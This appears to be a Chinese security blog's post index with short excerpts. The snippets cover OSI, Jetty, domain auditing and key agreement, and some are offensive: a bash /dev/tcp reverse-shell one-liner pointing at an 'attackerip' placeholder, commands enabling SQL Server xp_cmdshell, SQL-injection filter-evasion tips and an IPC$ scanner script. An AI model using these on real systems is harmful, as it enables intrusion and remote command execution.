网络安全
hack8
这个作者很懒,什么都没留下…
展开
-
使用sqlserver进行网页连接(端口扫描)
利用sqlserver进行端口扫描原创 2022-10-12 23:16:41 · 515 阅读 · 1 评论 -
Linux 一句话反弹shell
/bin/bash -i > /dev/tcp/attackerip/connect端口 0&1直接在服务原创 2014-09-29 03:33:16 · 3614 阅读 · 2 评论 -
ip 查询
http://as.robtex.com/xx.xx.xx.xx.html原创 2013-04-24 16:31:01 · 595 阅读 · 0 评论 -
计算机网络体系结构——OSI数据类型
OSI的数据类型中主要学习其数据单元(DU):DU就是OSI环境中交换的数据。包括服务数据单元、接口数据单元和协议数据单元,其具体情况和关系如下:服务数据单元(SDU):相邻层间交换的数据单元,SDU为服务原语的表现形式。接口数据单元(IDU):相邻层接口上体现的数据单元,IDU=SDU+接口控制信息ICI。协议数据单元(PDU):对等层间交换的数据单元,PDU的内容和格式由协议精确的原创 2013-01-28 18:50:24 · 2532 阅读 · 0 评论 -
sql server 2005下开启xp_cmdshell的办法
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;SQL2005开启'OPENROWSET'支持的方法:exec sp_configure 'show advanced options', 1;RECONFIGURE;exec转载 2012-04-18 18:29:03 · 1210 阅读 · 0 评论 -
linux下清空iptables规则具体方法如下:
linux下清空iptables规则具体方法如下: iptables -t nat -F iptables -t nat -X iptables -t nat -P PREROUTING ACCEPT iptables -t nat -P转载 2011-09-13 23:19:30 · 5269 阅读 · 0 评论 -
Jetty6在WINDOWS下的部署和配置
1、下载地址首页http://jetty.mortbay.com/jetty-6/下载地址http://dist.codehaus.org/jetty/jetty-6.1.x/下载文件为jetty-6.1.3.zip2、修改配置修改配置文件D:\t转载 2011-07-29 23:39:06 · 2610 阅读 · 0 评论 -
站对站密钥协定
站对站密钥协定是基于Diffie-Hellman的一种方法。它使用带有公钥证书(参看后面这一部分)的数字签名,在爱丽丝和鲍勃之间建立会话密钥,如图15-12所示。下面就是这种方法的步骤:●算出R1后,爱丽丝把R1发送给鲍勃(图15-12中的第一步和第二步)。●算出R2和会话密钥后转载 2011-07-25 23:00:19 · 936 阅读 · 2 评论 -
cryptoki of hsm
i run a code using ncryptoki librairie abd it gives me the full name. www.ncryptoki.comlook at this code:using System;using System.Collectio转载 2011-07-21 23:18:02 · 900 阅读 · 0 评论 -
如何查看域用户登陆域的时间?
如何查看域用户登陆域的时间?服务器是windows server 2003,客户机是windows xp,用户都是域用户。想在服务器上查看用户每次登入的时间。哪位同仁有办法?回答:您好!您需要在服务器上查看域用户每次登入的时间,可以通过在服务器上开启审核登录事件的方法实现。具体设置如下:1. 开始->管理工具->域控制器安全策略->本地策略->审核策略->审核登录事件->选择“成功”选项, 关闭“域控制器安全策略”管理单元。2. 在命令行提示符窗口中,输入“GPUDATE/FORCE”转载 2010-11-12 00:17:00 · 8538 阅读 · 0 评论 -
绕过防注入的11招
绕过防注入的11招 <br />1、运用编码技术绕过<br />如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。<br /><br />2、通过空格绕过<br />如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如<br />or' swords' =‘swords',由于mssql的松散性,我们可以把or 'swords' 之间的空格去掉,并不转载 2011-01-04 22:28:00 · 843 阅读 · 0 评论 -
用批处理写的一个Ipc$扫描器
<br />用批处理写的一个Ipc$扫描器(Ipc$Scan V2.0.bat),仅供学习!<br />@ECHO OFF<br />setlocal<br />title Ipc$Scan V2.0<br />:::::::::::::::::::::::::::主菜单:::::::::::::::::::::::<br />:MENU<br />COLOR 8A<br />set op=""<br />CLS<br />rem echo.输出空行,即相当于输入一个回车<br />ECHO.<br />E转载 2010-10-03 10:49:00 · 1139 阅读 · 0 评论 -
NetScreen ScreenOS配置丢失漏洞
NetScreen ScreenOS配置丢失漏洞 发布时间:2006.07.10 10:18 来源:绿盟科技 作者:<br /><br />受影响系统: NetScreen ScreenOS 4.0.2<br /><br />NetScreen ScreenOS 4.0.1<br />NetScreen ScreenOS 4.0-DIAL<br />NetScreen ScreenOS 4.0描述:BUGTRAQ ID: 7042<br /><br /> <br />Netscreen是转载 2010-06-19 15:38:00 · 695 阅读 · 0 评论 -
微软更改了IE处理ActiveX控件的交互方式
今天打开电脑上网,凡是使用了ActiveX控件和Flash的网页都需要先点击激活以后才能交互。据说由于专利问题,Microsoft 更改了IE处理ActiveX控件的交互方式。由于我做的页面也要使用ActiveX控件,给的感觉是:非常不爽!由于需要,必须把ActiveX控件处理成自动激活的,不需要手动点左键激活。遂,到微软的MSDN上查了一下,把原来直接在页面上使用标签改成js的cre转载 2009-10-20 15:13:00 · 1549 阅读 · 0 评论 -
Gmail Yaoo Cookie
http://pimpitup.googlecode.com/svn/trunk/google code 搜索 gmail yahoo cookie原创 2009-08-12 20:54:00 · 600 阅读 · 0 评论 -
windows 自动 telnet
每天都要登陆到服务器执行固定的操作,而且还需要执行很多次,因此想要在windows 做一个批处理文件,只要执行一个就可以登陆到几台计算机运行监控命令。 在windows 中实现这样的功能需要利用win 自带的VBscript 和批处理来实现。 首先建立telnet-172.16.3.2.vbs 的脚本文件 set sh=WScript.Creat原创 2009-08-04 18:56:00 · 2655 阅读 · 0 评论 -
FBController - (Facebook Control Utility) version 1.0
FBController - (Facebook Control Utility) version 1.0FBController - (Facebook Control Utility) version 1.0 Apr 30 2009 08:30PMQUAKER DOOMER (quakerdoomer inbox lv)FBController - The Ultimate Utili转载 2009-08-06 10:52:00 · 2125 阅读 · 0 评论 -
黑客攻防之防范入侵攻击主要方法
导读:防止入侵和攻击的主要技术措施包括访问控制技术、防火墙技术、入侵检测技术、安全扫描、安全审计和安全管理。本文中将详细介绍每一种技术,防范黑客攻击。关键词:入侵 攻击 访问控制 防火墙 入侵检测 安全扫描 审计 正在加载数据... 网络管理人员应认真分析各种可能的入侵和攻击形式,制定符合实际需要的网络安全策略,防止可能从网络和系统内部或外部发起的攻击行为,重点防止那些转载 2009-01-11 11:31:00 · 2423 阅读 · 0 评论